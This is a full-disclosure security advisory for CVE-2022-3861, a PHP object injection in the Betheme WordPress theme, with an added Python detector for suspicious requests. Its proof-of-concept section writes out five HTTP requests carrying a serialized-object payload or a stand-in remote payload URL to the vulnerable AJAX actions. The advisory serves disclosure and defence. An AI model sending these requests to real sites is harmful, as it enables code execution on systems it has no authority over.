List:       full-disclosure
Subject:    [FD] [CVE-2022-3861] Betheme <= 26.5.1.4 - Authenticated (Contributor+) PHP Object Injection
From:       "Julien Ahrens (RCE Security)" <info () rcesecurity ! com>
Date:       2022-11-18 8:40:00
Message-ID: 1401F8ED-781E-4D01-B830-F8AC58D205CF () rcesecurity ! com

RCE Security Advisory
https://www.rcesecurity.com


1. ADVISORY INFORMATION
=======================
Product:        Betheme
Vendor URL:     https://muffingroup.com/betheme/
Type:           Deserialization of Untrusted Data [CWE-502]
Date found:     2022-11-02
Date published: 2022-11-18
CVSSv3 Score:   8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
CVE:            CVE-2022-3861


2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
====================
BeTheme 26.5.1.4 and below


4. INTRODUCTION
===============
Ever since Betheme was just an idea, we knew that it would be different from all
other multipurpose WordPress themes we'd tried before.

We wanted to build something more than just another WordPress theme, that could
easily adapt to any project you need to work on without writing any code. A theme
designed from scratch to save your time & help you enjoy your freedom...

(from the vendor's homepage)


5. VULNERABILITY DETAILS
========================
The WordPress theme is vulnerable to multiple PHP object injections: user-supplied
input to several privileged WordPress AJAX routes is unserialized without validation:

- mfn_builder_import -> "mfn-items-import" parameter
- mfn_builder_import_page -> "mfn-items-import-page" parameter
- importdata -> "import" parameter
- importsinglepage -> "import" parameter
- importfromclipboard -> "import" parameter

To successfully exploit this vulnerability, an attacker must be authenticated with at
least WordPress "Contributor" rights.

Successful exploits can allow the attacker to execute arbitrary code.
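The following is an added detection example for defenders and is not part of this advisory
or of the Betheme code. It inspects form-encoded POST bodies sent to admin-ajax.php (for
instance from a WAF or application-level request log) and flags the five actions listed
above when their input parameter base64-decodes to a PHP serialized object, which is the
shape of the payload shown in the proof of concept below. Treating a plain URL in those
parameters as worth review is a conservative heuristic added here, not behaviour the
advisory describes. The sample bodies are constructed for the example; the action-to-parameter
map is taken from the list above.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs

# Actions and the parameter each one unserializes, as listed in the advisory.
VULNERABLE_ACTIONS = {
    "mfn_builder_import": "mfn-items-import",
    "mfn_builder_import_page": "mfn-items-import-page",
    "importdata": "import",
    "importsinglepage": "import",
    "importfromclipboard": "import",
}

# A PHP serialized object starts with  O:<name length>:"<class name>":<property count>:{
PHP_OBJECT_RE = re.compile(rb'O:\d+:"([^"]+)":\d+:\{')


def decode_b64(value: str):
    """Strict base64 decode; returns None when the value is not valid base64."""
    try:
        return base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None


def inspect_body(body: str) -> dict:
    """Classify one admin-ajax.php POST body.

    Returns a dict with 'suspicious' (bool) and a 'reason', plus the class name
    of the serialized object or the URL when one of those was found.
    """
    params = parse_qs(body, keep_blank_values=True)
    action = params.get("action", [""])[0]
    param = VULNERABLE_ACTIONS.get(action)
    if param is None:
        return {"action": action, "suspicious": False, "reason": "action not in scope"}

    values = params.get(param, [])
    if not values:
        return {"action": action, "suspicious": False, "reason": "parameter absent"}
    raw = values[0]

    decoded = decode_b64(raw)
    if decoded is not None:
        match = PHP_OBJECT_RE.search(decoded)
        if match:
            return {
                "action": action,
                "suspicious": True,
                "reason": "base64 PHP object",
                "class": match.group(1).decode("utf-8", errors="replace"),
            }

    # Heuristic added for this example: a remote URL in an import parameter is
    # worth a second look even though the body itself carries no object.
    if raw.startswith(("http://", "https://")):
        return {"action": action, "suspicious": True, "reason": "remote URL", "url": raw}

    return {"action": action, "suspicious": False, "reason": "no serialized object"}


def scan_bodies(bodies):
    """Return the findings for every body that was flagged as suspicious."""
    return [r for r in (inspect_body(b) for b in bodies) if r["suspicious"]]


# Constructed sample bodies: the first reuses the base64 blob from the advisory's
# proof of concept, the others are benign traffic and a URL-style import.
SAMPLE_BODIES = [
    "mfn-builder-nonce=abcd1234&action=importdata"
    "&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=",
    "action=heartbeat&data%5Bwp_autosave%5D=1",
    "mfn-builder-nonce=abcd1234&action=importsinglepage&import=https://your-remote-payload.com/",
    "action=importfromclipboard&import=aGVsbG8=",
]

if __name__ == "__main__":
    for finding in scan_bodies(SAMPLE_BODIES):
        print(finding)
```

Two caveats when putting this to use: standard web server access logs do not record POST bodies, so the check has to run where the body is visible (a WAF, a reverse proxy with body logging, or a WordPress request hook), and a hit against one of these actions from a Contributor-level account on a site still running 26.5.1.4 or earlier should be treated as an exploitation attempt. The root-cause fix belongs in the theme rather than in detection: never pass attacker-controlled input to PHP's unserialize(), or at minimum call it with the allowed_classes option set to false so no objects can be instantiated.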


6. PROOF OF CONCEPT
===================
To exploit the "mfn_builder_import" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 75
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your-auth-cookies]
Connection: close

mfn-builder-nonce=[your-nonce]&action=mfn_builder_import&mfn-items-import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=



To exploit the "mfn_builder_import_page" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 123
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your-auth-cookies]
Connection: close

mfn-builder-nonce=[your-nonce]&action=mfn_builder_import_page&mfn-items-import-page=https://your-remote-payload.com/



To exploit the "importdata" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 114
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your-auth-cookies]
Connection: close

mfn-builder-nonce=[your-nonce]&action=importdata&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=



To exploit the "importsinglepage" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 83
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your-auth-cookies]
Connection: close

mfn-builder-nonce=[your-nonce]&action=importsinglepage&import=https://your-remote-payload.com/


To exploit the "importfromclipboard" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 123
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your-auth-cookies]
Connection: close

mfn-builder-nonce=[your-nonce]&action=importfromclipboard&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=



7. SOLUTION
===========
Update to version 26.6


8. REPORT TIMELINE
==================
2022-11-01: Discovery of the vulnerability
2022-11-03: CVE requested from Wordfence (CNA)
2022-11-04: Wordfence assigns CVE-2022-3861
2022-11-08: Vendor notification
2022-11-08: Opened up a security support case on envato.com since the vendor usually doesn't respond
2022-11-16: Envato responds stating that the vendor released 26.6 which fixes this vulnerability
2022-11-18: Public disclosure


9. REFERENCES
=============
https://github.com/MrTuxracer/advisories




_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/